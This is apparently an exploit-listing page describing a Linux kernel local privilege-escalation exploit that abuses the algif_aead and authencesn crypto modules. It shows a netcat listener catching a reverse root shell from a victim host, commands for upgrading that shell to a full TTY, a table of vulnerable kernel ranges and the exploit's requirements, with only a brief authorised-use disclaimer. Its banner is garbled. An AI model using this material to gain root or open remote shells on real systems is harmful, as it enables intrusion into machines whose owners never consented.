Share
## https://sploitus.com/exploit?id=20851882-C949-5F96-940A-3AF7B9A460B4
```
   ____       _ _   ____             _
  / ___|___ _| | | |  _ \ ___   ___ | |_
 | |   / _ \ | | | | |_) / _ \ / _ \| __|
 | |__| (_) | | | |  _  4444
```

```
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)
```

### TTY upgrade (attacker side, inside the shell)

```bash
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash
```

---

## Affected Kernels

| From | To (exclusive) |
|------|----------------|
| 4.14 | 5.10.254 |
| 5.11 | 5.15.204 |
| 5.16 | 6.1.170  |
| 6.2  | 6.6.137  |
| 6.7  | 6.12.85  |
| 6.13 | 6.18.22  |
| 6.19 | 6.19.12  |
| 7.0  | rc1โ€“rc6  |

---

## Requirements

- **Python >= 3.10** (`os.splice()`)
- Read access to `/usr/bin/su` (world-readable on all distros)
- Kernel modules `algif_aead` and `authencesn` available
- No `sudo` required

---

## Author

**[danimrtzp](https://github.com/danimrtzp)**

---

## Disclaimer

For authorized security research and education only. Misuse is illegal.